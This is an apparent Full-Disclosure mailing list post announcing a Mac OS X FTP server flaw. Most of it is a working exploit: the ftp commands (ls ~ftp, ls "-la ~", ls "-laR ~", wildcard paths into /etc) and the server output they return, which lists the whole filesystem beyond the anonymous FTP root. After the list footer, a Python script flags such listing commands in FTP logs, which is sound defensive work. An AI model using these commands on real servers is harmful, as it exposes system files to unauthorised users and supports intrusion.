MacOS X FTP Server 0day

it was my finding, who carez

ftp get ...tar will retrieve all contents of underlying folder of user ftp.
(hint: works with correct user account in latest NcFTPD too)

ftp> ls ~ftp
200 PORT command successful.
150 Opening ASCII mode data connection for /us.
/.hotfiles.btree
/.rnd
/.Trashes
/.vol
/Applications
/automount
/bin
/cores
/Desktop DB
/Desktop DF
/dev
/Developer
/etc
/Groups
/Library
/mach
/mach.sym
/mach_kernel
/Network
/opt
/private
/sbin
/
/System
/tmp
226 Transfer complete.
ftp: 236 bytes received in 0,06Seconds 3,81Kbytes/sec.

ls ~ftp/etc/*/*

ftp> ls "-la ~"
227 Entering Passive Mode ()
150 Opening ASCII mode data connection for directory listing.
total 20011
drwxrwxr-t 34 0 80 1258 Dec 30 17:55 .
drwxrwxr-t 34 0 80 1258 Dec 30 17:55 ..
-rw-r--r-- 1 0 80 6148 Jul 19 2004 .DS_Store
d-wx-wx-wt 2 0 80 68 Jul 19 2004 .Trashes
-rw------- 1 0 80 786432 Sep 5 2007 .hotfiles.btree
-rw------- 1 0 80 1024 Nov 30 2006 .rnd
dr-xr-xr-x 2 0 0 160 Dec 30 17:55 .vol
drwxrwxr-x 35 0 80 1190 May 11 2009 Applications
-rw-r--r-- 1 0 80 29184 Dec 23 2006 Desktop DB
-rw-r--r-- 1 0 80 194178 Dec 23 2006 Desktop DF
drwxrwxr-x 3 0 80 102 May 11 2009 Developer
-rwxr-xr-x 3 501 80 1024 Jun 25 2007 DiskWarrior.dmg
drwxrwxr-x 2 501 80 68 Jul 17 2010 Groups
drwxrwxr-t 53 0 80 1802 Nov 30 2006 Library
drwxr-xr-x 1 0 0 512 Feb 11 11:54 Network
drwxrwxr-x 6 501 80 204 Nov 30 2006 Shared Items
drwxr-xr-x 4 0 0 136 May 11 2009 System
drwxrwxr-t 6 0 80 204 Nov 30 2006 Users
drwxrwxrwt 6 0 80 204 Dec 30 17:55 Volumes
drwxr-xr-x 4 0 80 136 Jun 8 2005 automount
drwxr-xr-x 48 0 0 1632 May 11 2009 bin
drwxr-xr-x 43 0 501 1462 Jun 28 2006 bru
drwxrwxr-t 2 0 80 68 Dec 8 2003 cores
dr-xr-xr-x 2 0 0 512 Dec 30 17:55 dev
lrwxr-xr-x 1 0 4294967294 11 Nov 30 2006 etc -> private/etc
lrwxr-xr-x 1 0 80 9 Dec 30 17:55 mach -> ???
-r--r--r-- 1 0 80 624040 Dec 30 17:55 mach.sym
-rw-r--r-- 1 0 0 8570484 Oct 10 2007 mach_kernel
drwxr-xr-x 3 0 0 102 Nov 4 2005 opt
drwxr-xr-x 6 0 0 204 Dec 30 17:55 private
drwxr-xr-x 64 0 0 2176 May 11 2009 sbin
lrwxr-xr-x 1 0 4294967294 11 Nov 30 2006 tmp -> private/tmp
drwxr-xr-x 10 0 0 340 May 11 2009 usr
lrwxr-xr-x 1 0 4294967294 11 Nov 30 2006 var -> private/var
226 Transfer complete.
ftp> ls "-la ~"

ls "-laR ~"

YOU NAME IT! WHOLE DIRTREE OF SERVER

/Kingcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
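
A detection sketch for the session above, added here and not part of the original post: it flags LIST/NLST commands on the FTP control channel whose argument carries ls options, a leading tilde, or wildcards in more than one path component, the three argument shapes the post uses. The command lines are constructed samples and the function names are hypothetical; extracting control-channel commands from a given server's logs is assumed to happen elsewhere.

```python
import re

# FTP verbs that a client "ls"/"dir" maps to on the control channel.
LISTING_VERBS = {"LIST", "NLST"}
GLOB = re.compile(r"[*?\[]")


def listing_findings(command_line):
    """Return the reasons one control-channel command resembles the listing
    requests in the post; an empty list means nothing was flagged."""
    verb, _, arg = command_line.strip().partition(" ")
    if verb.upper() not in LISTING_VERBS:
        return []
    tokens = arg.split()
    options = [t for t in tokens if t.startswith("-") and len(t) > 1]
    paths = [t for t in tokens if t not in options]

    def glob_depth(path):
        # Number of path components that contain a wildcard.
        return sum(1 for part in path.split("/") if GLOB.search(part))

    checks = [
        ("option", bool(options)),                        # e.g. -la handed to ls
        ("recursive", any("R" in o for o in options)),    # e.g. -laR
        ("tilde", any(p.startswith("~") for p in paths)), # ~ or ~user expansion
        ("deep-glob", any(glob_depth(p) > 1 for p in paths)),
    ]
    return [name for name, hit in checks if hit]


def scan(lines):
    """Return (command, reasons) pairs for every flagged command."""
    return [(l, f) for l in lines if (f := listing_findings(l))]


# Constructed sample of control-channel commands (not taken from a real log).
SAMPLE = [
    "USER ftp",
    "LIST",
    "NLST pub",
    "NLST ~ftp",
    "NLST ~ftp/etc/*/*",
    "LIST -la ~",
    "LIST -laR ~",
    "RETR readme.txt",
]

if __name__ == "__main__":
    for command, reasons in scan(SAMPLE):
        print(f"{command!r}: {', '.join(reasons)}")
```
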